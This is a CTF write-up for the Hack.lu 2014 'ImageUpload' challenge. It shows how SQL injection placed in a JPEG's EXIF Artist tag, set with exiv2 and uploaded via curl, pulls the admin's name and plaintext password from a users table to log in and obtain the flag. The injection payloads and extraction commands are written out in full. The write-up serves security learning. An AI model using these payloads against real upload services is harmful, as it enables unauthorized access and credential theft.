Hack.lu CTF 2014 - ImageUpload (200pts) writeup
The challenge description was: In the Wild Wild Web, there are really bad guys. The sheriff doesn't know them all. Therefore, he needs your help. Upload pictures of criminals to this site and help the sheriff to arrest them. You can make this Wild Wild Web much less wild!!!
After visiting the web page we see the following:
A link to a login form and an image uploader form. This page allows us to upload a picture to report a person wanted to the sheriff. The details of that person are taken from the image metadata, specifically the author tag is used as the name printed on the picture and in the Author column in the table:
Let's try and see if we can cause a SQL error by adding a quote in the author (artist) field in the image metadata:
mrt:~/hack.lu/imageupload$ exiv2 -M "set Exif.Image.Artist '''" oh.jpg; curl -c cookies.txt -b cookies.txt -F file=@oh.jpg -L https://wildwildweb.fluxfingers.net:1421/upload.php
This query output the following error: Error inserting in DB.
This is interesting, if we manage to cause an error while inserting into the database we might be able to insert our own data as well.
By looking at the output when uploading successfully a picture, we could assume the query looks like this:
INSERT INTO wanted (width, height, author, manufacturer, model) VALUES ('image width', 'image height', 'value of name', 'value of manufacturer', 'value of model')
Let's try to inject our own values for the Author, Manufacturer and Model column:
mrt:~/hack.lu/imageupload$ exiv2 -M "set Exif.Image.Artist 1',2,3) -- -" oh.jpg; curl -c cookies.txt -b cookies.txt -F file=@oh.jpg -L https://wildwildweb.fluxfingers.net:1421/upload.php
Great! We can insert our own data, which means we could also insert available values from the database such as the username and password of the admin. Normally we would try and output all available tables and columns from information_schema, it wasn't needed here since the database was using common names. After a couple guessing attempts we found out that the table is called users where username are stored in the column name and passwords in the password column.
Usually the first value returned is the admin. Instead of inserting a manufacturer and model, we are going to output the first value returned from the table users hoping it's an admin, we want the name and password so we can login using these credentials.
mrt:~/hack.lu/imageupload$ exiv2 -M "set Exif.Image.Artist 0',(SELECT name FROM users LIMIT 1), (SELECT password FROM users LIMIT 1)) -- -" oh.jpg; curl -c cookies.txt -b cookies.txt -F file=@oh.jpg -L
https://wildwildweb.fluxfingers.net:1421/upload.php
sheriff : AO7eikkOCucCFJOyyaaQ
We can login as the sheriff if the password is stored in plain text inside the database, let's try the login form with these credentials:
You are sucessfully logged in.
Flag: flag{1_5h07_7h3_5h3r1ff}
We got our flag:
flag{1_5h07_7h3_5h3r1ff}